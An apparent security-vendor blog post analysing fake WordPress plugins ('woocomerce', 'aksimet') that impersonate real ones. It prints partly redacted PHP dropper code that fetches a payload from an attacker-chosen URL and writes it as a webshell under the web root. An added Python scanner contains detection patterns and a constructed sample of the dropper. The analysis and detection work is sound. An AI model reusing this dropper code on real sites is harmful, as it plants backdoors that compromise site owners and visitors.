Malware plugins for WordPress (woocomerce & aksimet)

When a WordPress user account is compromised, the attacker is able to upload plugins. We have seen new malicious WordPress plugins named woocomerce and aksimet. These plugins have nothing to do with the real plugins they imitate, WooCommerce and Akismet.

Both of these plugins use the WordPress add_action('init', ...) hook to activate themselves and wait for commands from the attacker. Their primary purpose is simply to confirm that the plugin is active and then download webshells and other malware from the attacker onto the server.

First add_action function

// Hooked on 'init', so it runs on every request. Answers a probe request
// so the attacker can confirm that the plugin is installed and active.
add_action('init', 'wordpress_testAtivation');
function wordpress_testAtivation(){
    if($_GET['key']=='testActivation'){
        echo 'ActivatedSuccess';
        exit;
    }
}

Other add_action functions

add_action('init', 'wordpress_download');
add_action( 'pre_current_active_plugins', 'wordpress_plug_view_control' );
add_action( 'admin_head', 'wordpress_plug_view_js');

The wordpress_download add_action

This part of the malware takes its commands from URL GET parameters and uses PHP cURL to download the payload from a remote server and write it to a file under the document root.

function wordpress_download(){
    // Only runs when a secret GET parameter is present (value redacted in the sample)
    if($_GET['key']=='************'){
        // Prepends a fixed (redacted) string to the downloaded data before writing it
        function wordpress_file_func($path, $data){
            file_put_contents($path, '*************************'.$data);
        }
        // Fetch the payload from a URL taken from a GET parameter (name redacted)
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $_GET['***']);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 60);
        $data = curl_exec($ch);
        $dsdsvxz = $data.'';
        // Write it as a .php file directly under the web root; the file name is
        // also attacker-chosen (parameter name redacted)
        wordpress_file_func($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['*********'].'.php', $dsdsvxz);
    }
}

We have seen files like these written to the server; part of the file name is a random string:

wp-register-5bee02a00d46e5bee02a00d4bb.php
wp-register-5bed5f9b0729a5bed5f9b072fd.php
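As an added example (not part of the original post), a small Python scanner that looks for the chain shown in the quoted dropper code (an init hook, a GET-gated trigger, a cURL fetch and a file write, with the DOCUMENT_ROOT path as an extra signal) in every PHP file of a plugin directory, and separately matches the wp-register-<hex>.php file names listed above. The two PHP samples inside it are constructed: the first mimics the quoted code with placeholder parameter names, the second is ordinary plugin code; the directory passed to scan_tree is assumed to be wp-content/plugins or similar.

```python
import re
from pathlib import Path

# Source-level indicators drawn from the plugin code quoted in the post.
INDICATORS = {
    "init_hook": re.compile(r"add_action\(\s*['\"]init['\"]\s*,"),
    "get_gate": re.compile(r"\$_GET\[\s*['\"]\w*['\"]\s*\]\s*==\s*['\"]"),
    "remote_fetch": re.compile(r"CURLOPT_URL\s*,\s*\$_GET|\bcurl_exec\s*\("),
    "docroot_path": re.compile(r"\$_SERVER\[\s*['\"]DOCUMENT_ROOT['\"]\s*\]"),
    "file_write": re.compile(r"\bfile_put_contents\s*\("),
}
# Dropped files seen on disk: wp-register-<26 hex chars>.php
DROPPED_NAME = re.compile(r"^wp-register-[0-9a-f]{26}\.php$")

def scan_source(src: str) -> set:
    """Names of all indicators present in one PHP source text."""
    return {name for name, rx in INDICATORS.items() if rx.search(src)}

def is_dropper(src: str) -> bool:
    """Flag only the full chain (init hook, GET-gated trigger, remote fetch,
    file write); a lone add_action('init') is normal plugin code."""
    return {"init_hook", "get_gate", "remote_fetch", "file_write"} <= scan_source(src)

def dropped_files(names) -> list:
    """Keep only file names matching the observed webshell naming pattern."""
    return [n for n in names if DROPPED_NAME.match(n)]

def scan_tree(root: Path) -> list:
    """(path, indicators) for every PHP file under root that matches the chain."""
    hits = []
    for path in root.rglob("*.php"):
        src = path.read_text(errors="ignore")
        if is_dropper(src):
            hits.append((str(path), sorted(scan_source(src))))
    return hits
# Constructed samples: the first mimics the quoted dropper with placeholder
# parameter names, the second is ordinary plugin code that also hooks init.
MALICIOUS = """<?php
add_action('init', 'wordpress_download');
function wordpress_download(){
    if($_GET['key']=='PLACEHOLDER'){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $_GET['src']);
        $data = curl_exec($ch);
        file_put_contents($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['name'].'.php', $data);
    }
}"""
BENIGN = """<?php
add_action('init', 'my_register_post_type');
function my_register_post_type(){ register_post_type('book', array()); }"""
```

Run scan_tree(Path("wp-content/plugins")) on a copy of the site and review every hit by hand; the chain is a strong signal for this family but a legitimate updater plugin can match it too.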

Final Words

Use Malware Expert – Signatures to detect this malware in your web server files for FREE! Also change the password of the leaked user account, and check whether any extra users have been added; if so, remove them.

The only way to protect against this kind of attack once a user password has leaked is to start using two-factor authentication (2FA).

Web servers running ModSecurity with the Malware.Expert – ModSecurity rules are protected against other attacks.